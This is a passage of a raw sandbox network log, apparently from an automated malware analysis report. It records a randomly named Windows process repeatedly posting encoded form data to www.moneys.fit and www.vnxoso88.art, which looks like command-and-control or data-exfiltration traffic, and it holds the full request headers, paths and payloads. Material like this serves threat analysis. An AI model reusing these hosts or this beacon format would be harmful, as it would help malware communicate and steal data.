                                                                                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGY5MzA2YzEtMjU4ZS00MDkzLTlhYmYtMTVjZDBjYjI2N2MxIiwicGFnZV90aW1lIjoxNzMxNDIxOTY3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaml1aml1eGkubG92ZS9


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            49192.168.11.20497683.33.130.190802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:52.842777014 CET741OUTPOST /z4qw/ HTTP/1.1
                                                                                                                            Host: www.moneys.fit
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.moneys.fit
                                                                                                                            Referer: http://www.moneys.fit/z4qw/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 6f 79 63 35 2b 77 7a 30 39 5a 37 78 72 45 30 32 37 65 7a 6b 64 6c 52 66 45 53 32 61 75 31 42 6f 61 73 45 6b 52 34 79 55 37 77 6c 64 4e 37 4b 30 58 38 70 6d 70 63 35 42 55 72 6a 55 31 75 5a 33 5a 77 70 72 35 75 54 6f 77 31 34 59 79 52 43 45 75 79 59 77 55 6c 45 45 71 54 56 4f 71 4f 69 61 69 61 4a 69 62 77 4d 66 4e 74 79 52 61 76 61 5a 6a 6a 44 6b 6a 34 39 70 41 61 4f 4d 54 79 6b 2f 30 37 63 64 30 55 5a 78 49 68 56 48 4e 2b 33 4b 45 6c 79 55 2b 6b 33 61 65 37 54 42 34 67 2b 6c 41 63 31 6c 6a 77 46 45 55 56 36 36 35 74 4f 51 35 5a 4e 7a 42 45 30 2f 73 69 48 71 52 4c 43 44 46 41 3d 3d
                                                                                                                            Data Ascii: mRu=oyc5+wz09Z7xrE027ezkdlRfES2au1BoasEkR4yU7wldN7K0X8pmpc5BUrjU1uZ3Zwpr5uTow14YyRCEuyYwUlEEqTVOqOiaiaJibwMfNtyRavaZjjDkj49pAaOMTyk/07cd0UZxIhVHN+3KElyU+k3ae7TB4g+lAc1ljwFEUV665tOQ5ZNzBE0/siHqRLCDFA==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            50192.168.11.20497693.33.130.190802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:55.513207912 CET761OUTPOST /z4qw/ HTTP/1.1
                                                                                                                            Host: www.moneys.fit
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.moneys.fit
                                                                                                                            Referer: http://www.moneys.fit/z4qw/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 6f 79 63 35 2b 77 7a 30 39 5a 37 78 71 6e 73 32 6f 70 76 6b 4b 56 52 59 61 69 32 61 67 56 42 73 61 73 49 6b 52 36 66 4a 37 47 4e 64 4f 65 32 30 55 34 39 6d 73 63 35 42 41 37 69 2f 6f 65 5a 38 5a 77 6c 38 35 73 48 6f 77 30 63 59 79 54 61 45 75 46 73 78 56 31 45 47 68 7a 56 41 6b 75 69 61 69 61 4a 69 62 30 63 31 4e 74 71 52 62 63 43 5a 69 47 2f 6c 67 34 39 6f 55 4b 4f 4d 58 79 6c 58 30 37 63 6a 30 52 77 35 49 6e 5a 48 4e 2f 48 4b 45 78 6d 56 78 6b 33 6d 51 62 53 4d 34 43 72 76 59 39 5a 51 6d 68 56 68 58 45 75 2f 78 62 44 4b 6b 72 35 58 43 58 6f 4e 6f 53 2b 43 54 4a 44 59 59 43 67 55 6e 50 58 57 75 43 6f 6a 4f 4b 75 6d 43 6b 54 33 53 75 34 3d
                                                                                                                            Data Ascii: mRu=oyc5+wz09Z7xqns2opvkKVRYai2agVBsasIkR6fJ7GNdOe20U49msc5BA7i/oeZ8Zwl85sHow0cYyTaEuFsxV1EGhzVAkuiaiaJib0c1NtqRbcCZiG/lg49oUKOMXylX07cj0Rw5InZHN/HKExmVxk3mQbSM4CrvY9ZQmhVhXEu/xbDKkr5XCXoNoS+CTJDYYCgUnPXWuCojOKumCkT3Su4=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            51192.168.11.20497703.33.130.190802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:58.185039997 CET2578OUTPOST /z4qw/ HTTP/1.1
                                                                                                                            Host: www.moneys.fit
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.moneys.fit
                                                                                                                            Referer: http://www.moneys.fit/z4qw/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 6f 79 63 35 2b 77 7a 30 39 5a 37 78 71 6e 73 32 6f 70 76 6b 4b 56 52 59 61 69 32 61 67 56 42 73 61 73 49 6b 52 36 66 4a 37 47 46 64 4e 72 36 30 55 66 42 6d 76 63 35 42 44 37 6a 59 6f 65 5a 74 5a 77 39 77 35 73 62 34 77 32 55 59 79 32 4f 45 6d 51 41 78 63 31 45 47 75 54 56 4e 71 4f 69 50 69 61 59 70 62 77 34 31 4e 74 71 52 62 62 36 5a 79 6a 44 6c 74 59 39 70 41 61 4f 51 54 79 6c 73 30 34 73 56 30 52 38 70 49 33 35 48 4f 66 58 4b 47 43 4f 56 38 6b 33 6b 64 37 54 66 34 43 33 73 59 39 46 32 6d 68 68 62 58 46 32 2f 79 61 71 74 32 72 39 2f 41 31 67 6c 30 54 75 48 58 35 4f 49 65 43 55 38 72 63 62 4a 6e 33 77 72 47 72 4b 65 5a 52 37 64 49 4c 76 30 58 6a 69 61 47 4a 6d 38 4b 69 46 51 49 65 73 39 55 54 44 48 2f 57 78 70 47 62 59 4b 4b 4f 66 48 4d 6d 75 4a 31 5a 54 56 2f 2f 48 68 45 69 61 4c 33 4e 58 48 37 33 78 38 6d 6f 61 37 6a 36 36 69 65 73 6e 50 45 4a 4c 41 6a 56 41 33 62 41 4e 72 67 73 63 44 7a 70 42 75 47 2f 78 4c 37 79 50 42 61 39 49 47 35 6f 2f 44 76 2b 64 55 70 48 74 64 69 69 61 44 77 41 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=oyc5+wz09Z7xqns2opvkKVRYai2agVBsasIkR6fJ7GFdNr60UfBmvc5BD7jYoeZtZw9w5sb4w2UYy2OEmQAxc1EGuTVNqOiPiaYpbw41NtqRbb6ZyjDltY9pAaOQTyls04sV0R8pI35HOfXKGCOV8k3kd7Tf4C3sY9F2mhhbXF2/yaqt2r9/A1gl0TuHX5OIeCU8rcbJn3wrGrKeZR7dILv0XjiaGJm8KiFQIes9UTDH/WxpGbYKKOfHMmuJ1ZTV//HhEiaL3NXH73x8moa7j66iesnPEJLAjVA3bANrgscDzpBuG/xL7yPBa9IG5o/Dv+dUpHtdiiaDwAt19JEHV7aObUDt6WD0gTA5fkVwEHQwH7SG5bstxrD4ArjkW1WQF1c5pumpqht8l4TLzuaXSeELiOORa8v3vPaeEupjKTDCwpU02j3d4XYWUIH762fkodxNEwE6ZtObzUwAHZstn3TWSyzlkbf4fbn0ULcXycy+tfK/jgZT7mxx/1TMPlNzOceg3Iak7TG2fZfnxFdThdmWAMcHk+HVO/1957mTB8iI6TdbUsri/vutfdD2VGEigOvVYESApc2M/TyWekM3XIRVNBJA6yszkjvEaOPHrZEKAkHq3Ikls6cUqgr5j+37j92u+B1Kd6poO4SCEc7mdEUM+ezOj/sC8L09PZp4a5IWwdX49PcXiupLfGMlntWKQk5i/6DgxJGuprCvAqd0XdD6uijKpAQMHVwtcqo5WXUnQRItOL7Fw9D0YqIHmFEP/RDIrglmfHKrjRptuNYunSPkw+z9lE/Q9Ru/0KNs0wlAzEWQMxfq7FYBMLFtSK7JS4+YfrBBp5259y13LHSU0lwSgyNTA+pWpas1qL+ISDoFgeqiAYKLtEzhFvSr4R5Hb1b9ishXfFCGsNM6mGKoL2KpCO8gXlkO7TNtadN+DLEiggC53qvDkyJx4rxQ7fJQxE8Ava7H8nv9ayrYPQQX2suicP6DA7g7IxmxOCVciNIfjJxU [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:32:58.185067892 CET5156OUTData Raw: 77 68 75 63 36 30 70 6a 51 79 38 70 74 33 50 46 6e 57 56 66 71 74 75 34 65 32 36 4a 71 51 39 6c 47 61 71 75 49 4a 6a 76 50 69 65 6d 33 56 43 39 52 67 63 77 46 72 73 62 55 43 2b 57 54 62 78 48 69 4b 4b 2f 4e 5a 4b 30 55 35 4f 50 38 4b 77 2f 33 66
                                                                                                                            Data Ascii: whuc60pjQy8pt3PFnWVfqtu4e26JqQ9lGaquIJjvPiem3VC9RgcwFrsbUC+WTbxHiKK/NZK0U5OP8Kw/3fdduagt5fnxoPmJDvuacnUUvlE7IcBHyS7VFETc8ChkAXx2ziAY1WOuCuQynpJyZKtP6UPkQ3ZjQ47UBIceYjMcLzuOiS0ISCMkhqRM0Q/SvN2wQTu9Bbm40RBLYPKZaeBvtG7ELXew9INZc83fYTahI3tU7822Dmi
                                                                                                                            Nov 12, 2024 15:32:58.185115099 CET176OUTData Raw: 59 34 79 64 6a 79 39 67 55 73 4f 44 49 65 46 51 5a 64 71 2f 50 79 64 47 4a 72 70 2f 64 78 77 48 6f 78 53 6b 4a 39 6e 45 68 64 57 72 59 75 6c 7a 54 77 5a 48 34 72 65 66 33 79 33 53 6d 30 59 49 72 4f 56 58 5a 75 4d 74 76 31 54 35 64 43 55 56 61 36
                                                                                                                            Data Ascii: Y4ydjy9gUsODIeFQZdq/PydGJrp/dxwHoxSkJ9nEhdWrYulzTwZH4ref3y3Sm0YIrOVXZuMtv1T5dCUVa6NZQlRE26BzWYry5t3g8s/HCapnpcBMTsJSKrVhGOxmt2e/NMi1ZXyxV7ouYRW1s3rZ5A+fhSh8Hfr/NYJ5VN3Xobe6Ww==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            52192.168.11.20497713.33.130.190802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:00.852329016 CET473OUTGET /z4qw/?mRu=lw0Z9E/N2I/dpWlk8pTLJHRCZkuY3j9SfKchD5ao+gJdMbWwfo1urvInPerR2ecaSF54xdut+09OjjfToxgsYGp4jUJZlMustb83Phs9Oq/TesXOyzSulKc=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.moneys.fit
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:33:00.987587929 CET388INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Tue, 12 Nov 2024 14:33:00 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 248
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 52 75 3d 6c 77 30 5a 39 45 2f 4e 32 49 2f 64 70 57 6c 6b 38 70 54 4c 4a 48 52 43 5a 6b 75 59 33 6a 39 53 66 4b 63 68 44 35 61 6f 2b 67 4a 64 4d 62 57 77 66 6f 31 75 72 76 49 6e 50 65 72 52 32 65 63 61 53 46 35 34 78 64 75 74 2b 30 39 4f 6a 6a 66 54 6f 78 67 73 59 47 70 34 6a 55 4a 5a 6c 4d 75 73 74 62 38 33 50 68 73 39 4f 71 2f 54 65 73 58 4f 79 7a 53 75 6c 4b 63 3d 26 55 4a 3d 37 48 31 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mRu=lw0Z9E/N2I/dpWlk8pTLJHRCZkuY3j9SfKchD5ao+gJdMbWwfo1urvInPerR2ecaSF54xdut+09OjjfToxgsYGp4jUJZlMustb83Phs9Oq/TesXOyzSulKc=&UJ=7H1XM"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            53192.168.11.2049772199.59.243.227802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:06.430661917 CET747OUTPOST /x1pj/ HTTP/1.1
                                                                                                                            Host: www.vnxoso88.art
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.vnxoso88.art
                                                                                                                            Referer: http://www.vnxoso88.art/x1pj/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 6d 70 38 31 47 77 68 6f 64 34 59 43 5a 30 70 65 46 4b 4d 61 57 74 47 79 38 4d 69 4b 6e 34 38 37 4a 33 31 33 4f 6d 4d 52 39 75 36 38 57 67 72 61 30 54 61 75 78 55 47 59 78 79 42 51 4d 34 45 4a 67 63 7a 78 53 67 31 6a 30 43 44 77 58 64 33 79 7a 75 68 43 71 70 79 64 43 4b 6a 6a 36 4e 76 7a 48 2f 59 42 74 56 4d 6d 35 71 54 67 66 65 70 31 65 34 59 50 58 39 63 76 34 39 4b 58 4c 49 39 6b 56 4d 48 35 2b 59 6f 64 6e 58 77 45 37 6d 52 47 43 37 71 42 6d 78 49 65 47 6a 51 69 74 79 30 4d 6f 55 38 41 38 39 75 5a 6f 77 78 43 50 46 6c 46 34 36 61 63 61 56 47 34 6e 36 35 76 6a 62 75 32 45 41 3d 3d
                                                                                                                            Data Ascii: mRu=mp81Gwhod4YCZ0peFKMaWtGy8MiKn487J313OmMR9u68Wgra0TauxUGYxyBQM4EJgczxSg1j0CDwXd3yzuhCqpydCKjj6NvzH/YBtVMm5qTgfep1e4YPX9cv49KXLI9kVMH5+YodnXwE7mRGC7qBmxIeGjQity0MoU8A89uZowxCPFlF46acaVG4n65vjbu2EA==
                                                                                                                            Nov 12, 2024 15:33:06.570781946 CET1289INHTTP/1.1 200 OK
                                                                                                                            date: Tue, 12 Nov 2024 14:33:06 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1118
                                                                                                                            x-request-id: 5ba46aa8-d800-460b-91ab-7004720afb1a
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZK8Q16LEXMGxso9WDA24G2qwX52/yRdkhnAsLp9Kg2dOxJ9Bxi1U0gyMouSwYLFHpftGmEAk74W6q7b2hqEeRw==
                                                                                                                            set-cookie: parking_session=5ba46aa8-d800-460b-91ab-7004720afb1a; expires=Tue, 12 Nov 2024 14:48:06 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 4b 38 51 31 36 4c 45 58 4d 47 78 73 6f 39 57 44 41 32 34 47 32 71 77 58 35 32 2f 79 52 64 6b 68 6e 41 73 4c 70 39 4b 67 32 64 4f 78 4a 39 42 78 69 31 55 30 67 79 4d 6f 75 53 77 59 4c 46 48 70 66 74 47 6d 45 41 6b 37 34 57 36 71 37 62 32 68 71 45 65 52 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZK8Q16LEXMGxso9WDA24G2qwX52/yRdkhnAsLp9Kg2dOxJ9Bxi1U0gyMouSwYLFHpftGmEAk74W6q7b2hqEeRw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                            Nov 12, 2024 15:33:06.570797920 CET518INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWJhNDZhYTgtZDgwMC00NjBiLTkxYWItNzAwNDcyMGFmYjFhIiwicGFnZV90aW1lIjoxNzMxNDIxOTg2LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudm54b3NvODguYXJ0L3g


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            54192.168.11.2049773199.59.243.227802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:09.092072964 CET767OUTPOST /x1pj/ HTTP/1.1
                                                                                                                            Host: www.vnxoso88.art
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.vnxoso88.art
                                                                                                                            Referer: http://www.vnxoso88.art/x1pj/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 6d 70 38 31 47 77 68 6f 64 34 59 43 59 55 5a 65 48 72 4d 61 43 39 47 39 7a 73 69 4b 70 59 38 42 4a 32 4a 33 4f 69 38 2f 39 63 65 38 57 41 62 61 31 53 61 75 6b 55 47 59 36 53 42 49 42 59 45 53 67 63 4f 45 53 6c 56 6a 30 43 58 77 58 5a 7a 79 7a 5a 39 64 37 70 79 66 4b 71 6a 74 6b 39 76 7a 48 2f 59 42 74 56 78 42 35 71 4c 67 66 50 5a 31 4d 4b 77 4f 65 64 63 73 79 64 4b 58 42 59 39 67 56 4d 48 62 2b 61 4e 79 6e 52 38 45 37 6a 31 47 43 50 65 47 76 78 49 45 4a 44 52 6c 6a 53 64 70 73 33 73 66 74 66 2b 36 6c 7a 35 73 44 7a 6f 66 6c 49 75 34 5a 47 61 4b 6a 4b 41 48 68 5a 76 74 5a 46 72 7a 72 68 52 57 35 52 56 6a 46 6c 48 43 66 42 59 2b 58 6a 77 3d
                                                                                                                            Data Ascii: mRu=mp81Gwhod4YCYUZeHrMaC9G9zsiKpY8BJ2J3Oi8/9ce8WAba1SaukUGY6SBIBYESgcOESlVj0CXwXZzyzZ9d7pyfKqjtk9vzH/YBtVxB5qLgfPZ1MKwOedcsydKXBY9gVMHb+aNynR8E7j1GCPeGvxIEJDRljSdps3sftf+6lz5sDzoflIu4ZGaKjKAHhZvtZFrzrhRW5RVjFlHCfBY+Xjw=
                                                                                                                            Nov 12, 2024 15:33:09.227420092 CET1289INHTTP/1.1 200 OK
                                                                                                                            date: Tue, 12 Nov 2024 14:33:08 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1118
                                                                                                                            x-request-id: 66966c7c-2ceb-49d2-8dc3-55559124ab99
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZK8Q16LEXMGxso9WDA24G2qwX52/yRdkhnAsLp9Kg2dOxJ9Bxi1U0gyMouSwYLFHpftGmEAk74W6q7b2hqEeRw==
                                                                                                                            set-cookie: parking_session=66966c7c-2ceb-49d2-8dc3-55559124ab99; expires=Tue, 12 Nov 2024 14:48:09 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 4b 38 51 31 36 4c 45 58 4d 47 78 73 6f 39 57 44 41 32 34 47 32 71 77 58 35 32 2f 79 52 64 6b 68 6e 41 73 4c 70 39 4b 67 32 64 4f 78 4a 39 42 78 69 31 55 30 67 79 4d 6f 75 53 77 59 4c 46 48 70 66 74 47 6d 45 41 6b 37 34 57 36 71 37 62 32 68 71 45 65 52 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZK8Q16LEXMGxso9WDA24G2qwX52/yRdkhnAsLp9Kg2dOxJ9Bxi1U0gyMouSwYLFHpftGmEAk74W6q7b2hqEeRw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                            Nov 12, 2024 15:33:09.227469921 CET518INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjY5NjZjN2MtMmNlYi00OWQyLThkYzMtNTU1NTkxMjRhYjk5IiwicGFnZV90aW1lIjoxNzMxNDIxOTg5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudm54b3NvODguYXJ0L3g


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            55192.168.11.2049774199.59.243.227802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:11.752958059 CET2578OUTPOST /x1pj/ HTTP/1.1
                                                                                                                            Host: www.vnxoso88.art
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.vnxoso88.art
                                                                                                                            Referer: http://www.vnxoso88.art/x1pj/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
